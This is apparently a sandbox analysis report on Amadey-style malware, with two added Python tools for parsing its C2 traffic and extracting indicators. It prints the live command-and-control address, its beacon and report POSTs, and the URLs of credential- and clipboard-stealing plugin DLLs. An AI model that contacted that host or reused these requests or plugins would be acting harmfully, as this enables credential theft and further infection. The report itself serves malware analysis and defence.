r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s (17 identical requests in the capture)
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F (16 identical requests in the capture, interleaved with the st=s requests)
Source: Joe Sandbox View IP Address: 185.215.113.32 185.215.113.32
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.32 (50 connections in the capture, all to this address)
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_004EC990 recv,recv,recv,recv, 0_2_004EC990
Source: global traffic HTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic HTTP traffic detected: GET /yandex/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.32
Source: unknown HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
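The POST and GET lines above are the whole of this sample's observable C2 conversation: a 4-byte st=s check-in, a fixed-length r=<hex> report, and two plugin fetches, all sent to an IP literal with no DNS lookup. The Python below is an editor-added example, not Joe Sandbox or Amadey code. It parses lines in the report's own concatenated-header format, decodes the Data Raw hex, cross-checks it against Content-Length, and classifies each request. The labels "status beacon" and "hex report" are the editor's names for the two request shapes, and the r= payload is only unhexed, not decrypted, since the report gives no key.

```python
"""Parse and classify the Amadey C2 requests listed in the report, in the report's own line format.
Editor's added example. Sample lines are copied from the report; the long POST is rebuilt from its
"Data Ascii" value because its "Data Raw" column is just that text as hex bytes."""
import ipaddress
import re
from collections import Counter

# Constructed sample input (copied / rebuilt from the report's HTTP lines).
STATUS_LINE = (
    "Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1"
    "Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32"
    "Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s"
)
REPORT_ASCII = (
    "r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DD"
    "F642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F"
)
REPORT_LINE = (
    "Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1"
    "Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32"
    f"Content-Length: {len(REPORT_ASCII)}Cache-Control: no-cacheData Raw: "
    + " ".join(f"{b:02x}" for b in REPORT_ASCII.encode()) + " Data Ascii: " + REPORT_ASCII
)
PLUGIN_LINE = ("Source: global traffic HTTP traffic detected: GET /yandex/Plugins/cred64.dll "
               "HTTP/1.1Host: 185.215.113.32")

# The report glues header lines together with no separator, so each field is matched on its own.
_METHOD = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]")
_CTYPE = re.compile(r"Content-Type: (\S+?)(?=Host:|Content-Length:|Cache-Control:|Data Raw:)")
_HOST = re.compile(r"Host: ([\w.\-]+?)(?=Content-|Cache-Control:|Data Raw:|$)")
_CLEN = re.compile(r"Content-Length: (\d+)")
_RAW = re.compile(r"Data Raw: ((?:[0-9a-f]{2} )+)")


def parse_report_line(line: str) -> dict:
    """One 'HTTP traffic detected' line -> dict; the body is decoded from the Data Raw hex."""
    m = _METHOD.search(line)
    if not m:
        raise ValueError("not an HTTP traffic line")
    ctype, host, clen, raw = (p.search(line) for p in (_CTYPE, _HOST, _CLEN, _RAW))
    return {
        "method": m.group(1),
        "path": m.group(2),
        "content_type": ctype.group(1) if ctype else None,
        "host": host.group(1) if host else None,
        "content_length": int(clen.group(1)) if clen else None,
        "body": bytes.fromhex(raw.group(1).replace(" ", "")) if raw else b"",
    }


def classify(req: dict) -> str:
    """Label a parsed request against the request shapes this sample produces."""
    body = req["body"]
    if req["content_length"] is not None and req["content_length"] != len(body):
        return "length mismatch"   # truncated capture or parse error: do not trust the body
    if req["method"] == "GET" and req["path"].lower().endswith(".dll"):
        return "dll download"      # the cred64 / clip64 plugin fetches
    if (req["method"] != "POST" or not req["path"].endswith("/index.php")
            or req["content_type"] != "application/x-www-form-urlencoded"):
        return "other"
    if body == b"st=s":
        return "status beacon"     # 4-byte check-in, repeated between reports
    if body.startswith(b"r=") and re.fullmatch(rb"(?:[0-9A-F]{2})+", body[2:]):
        return "hex report"        # r=<upper-case hex>, even length so it decodes to bytes
    return "other"


def decode_report_payload(req: dict) -> bytes:
    """Strip the r= wrapper and undo the hex layer; the result is still opaque (encrypted) data."""
    return bytes.fromhex(req["body"][2:].decode("ascii"))


def summarize(lines) -> Counter:
    """Count request classes per destination, noting whether the Host header is a bare IP."""
    counts = Counter()
    for line in lines:
        req = parse_report_line(line)
        try:
            ipaddress.ip_address(req["host"])
            name_kind = "ip-literal"   # matches the 'TCP traffic without DNS query' entries
        except ValueError:
            name_kind = "hostname"
        counts[(req["host"], req["path"], name_kind, classify(req))] += 1
    return counts


if __name__ == "__main__":
    # The report lists 17 status beacons and 16 hex reports, all to one host and path.
    for key, n in summarize([STATUS_LINE] * 17 + [REPORT_LINE] * 16 + [PLUGIN_LINE]).items():
        print(n, key)
    print(len(decode_report_payload(parse_report_line(REPORT_LINE))), "payload bytes")
```

Run over the 17 st=s and 16 r= entries the report lists, summarize returns two keys, both for 185.215.113.32 /yandex/index.php with an ip-literal host, and the r= body unhexes to 76 opaque bytes. A mismatch between Content-Length and the decoded Data Raw flags a truncated capture rather than a new request type, which is why the check comes first.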
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/ws
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll&
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/Plugins/clip64.dll1
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/Plugins/cred64.dll2
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000336E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php%
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php:10
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1&
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1r
Source: rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.php?wal=1tesf
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpK
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpVl
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpWindows
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpa
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpa0
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpa2ab05
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpg
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpn
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpp
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phprsion
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpu
Source: explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.32/yandex/index.phpx
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000B.00000002.2031780544.000002004893F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.2050170977.000002005F3BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
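The memory strings above contain the C2 URL many times with different trailing bytes (index.php%, index.php2ab05, index.phpWindows, clip64.dll&). These are not distinct URLs; they are the same string followed by whatever happened to sit after it in the dump, so copying them verbatim produces a bloated and partly wrong IOC list. The URLs attributed only to powershell.exe (nuget.org, contoso.com, pesterbdd.com, schemas.xmlsoap.org, aka.ms) are the standard contents of PowerShell's module manifests and help files and appear in any report where powershell.exe runs; they are not sample-derived indicators. The Python below is an editor-added example, not report or malware code. It folds each string onto the shortest observed URL it extends, unless the tail starts a new path segment or query parameter, and separates strings seen in the sample's own processes from those seen elsewhere. The process set is an assumption taken from the report's process tree: wIaKimJFke.exe, its dropped copy explorgu.exe, and the rundll32.exe that hosts the downloaded plugin DLLs.

```python
"""Reduce 'String found in binary or memory' report lines to a clean set of network IOCs.
Editor's added example; the suffix-folding rule is a heuristic for memory-dump artifacts
(a URL followed by whatever bytes sat after it in memory), not a property of Amadey."""
import re
from collections import defaultdict

# Constructed input: a subset of the report's lines, rebuilt from their process/region prefix
# and URL; one memory region id is kept per process for brevity.
EXPLORGU = "explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmp"
RUNDLL = "rundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmp"
PWSH = "powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmp"
C2 = "http://185.215.113.32"
SAMPLE_LINES = [f"Source: {src} String found in binary or memory: {url}" for src, url in [
    (EXPLORGU, C2 + "/"),
    (EXPLORGU, C2 + "/ws"),
    (EXPLORGU, C2 + "/yandex/Plugins/clip64.dll"),
    (EXPLORGU, C2 + "/yandex/Plugins/clip64.dll&"),
    (EXPLORGU, C2 + "/yandex/Plugins/clip64.dll1"),
    (EXPLORGU, C2 + "/yandex/Plugins/cred64.dll"),
    (EXPLORGU, C2 + "/yandex/Plugins/cred64.dll2"),
    (EXPLORGU + ", " + RUNDLL, C2 + "/yandex/index.php"),
    (EXPLORGU, C2 + "/yandex/index.php2ab05"),
    (EXPLORGU, C2 + "/yandex/index.phpWindows"),
    (EXPLORGU, C2 + "/yandex/index.phpa0"),
    (RUNDLL, C2 + "/yandex/index.php?wal=1"),
    (RUNDLL, C2 + "/yandex/index.php?wal=1tesf"),
    (PWSH, "http://nuget.org/NuGet.exe"),
    (PWSH, "https://contoso.com/"),
    (PWSH, "https://contoso.com/License"),
]]
# Processes that belong to the sample per the report's process tree (rundll32.exe is included
# only because the report shows it hosting the downloaded plugin DLLs). Editor's assumption.
SAMPLE_PROCESSES = {"wIaKimJFke.exe", "explorgu.exe", "rundll32.exe"}

_LINE = re.compile(r"^Source: (?P<src>.+?) String found in binary or memory: (?P<url>\S+)$")
_PROC = re.compile(r"\b([\w\-]+\.exe)\b")
_TAIL = re.compile(r"[^/?=]{1,8}")   # a short tail that adds no path segment or query parameter


def parse_strings(lines):
    """Map each raw URL string to the set of processes whose memory contained it."""
    seen = defaultdict(set)
    for line in lines:
        m = _LINE.match(line)
        if m:
            seen[m.group("url")].update(_PROC.findall(m.group("src")))
    return seen


def is_dump_artifact(base, longer):
    """True if `longer` is `base` plus trailing junk. A base ending in '/' never absorbs
    anything, so '/ws' stays its own path instead of being folded into '/'."""
    if base == longer or base.endswith("/") or not longer.startswith(base):
        return False
    return _TAIL.fullmatch(longer[len(base):]) is not None


def canonicalize(raw_urls):
    """{raw_url: canonical_url}: each string folds onto the shortest observed URL it extends."""
    urls = sorted(set(raw_urls), key=len)
    canon = {}
    for u in urls:
        bases = [b for b in urls if is_dump_artifact(b, u)]
        canon[u] = min(bases, key=len) if bases else u
    return canon


def extract_iocs(lines, sample_processes):
    """Split canonical URLs into those seen in the sample's processes and context-only ones."""
    seen = parse_strings(lines)
    canon = canonicalize(seen)
    iocs, context_only = defaultdict(set), defaultdict(set)
    for raw, procs in seen.items():
        bucket = iocs if procs & sample_processes else context_only
        bucket[canon[raw]].update(procs)
    return dict(iocs), dict(context_only)


if __name__ == "__main__":
    iocs, context = extract_iocs(SAMPLE_LINES, SAMPLE_PROCESSES)
    for url, procs in sorted(iocs.items()):
        print(url, sorted(procs))
    print("context only:", sorted(context))
```

On the subset embedded above the result is six canonical URLs for the sample (the root, /ws, the two plugin DLLs, index.php and index.php?wal=1) and three context-only strings. A string such as cred64.dll2 is only folded when its base cred64.dll was itself observed, which is why the heuristic should run over the full string list rather than a hand-picked subset.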
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E222580 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__ehhandler$___std_fs_get_file_id@8,__ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,__ehhandler$___std_fs_get_file_id@8, 10_2_6E222580

System Summary

Source: wIaKimJFke.exe Static PE information: section name:
Source: wIaKimJFke.exe Static PE information: section name: .idata
Source: wIaKimJFke.exe Static PE information: section name:
Source: explorgu.exe.0.dr Static PE information: section name:
Source: explorgu.exe.0.dr Static PE information: section name: .idata
Source: explorgu.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\wIaKimJFke.exe File created: C:\Windows\Tasks\explorgu.job Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_0052707B 0_2_0052707B
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00526809 0_2_00526809
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_005224D0 0_2_005224D0
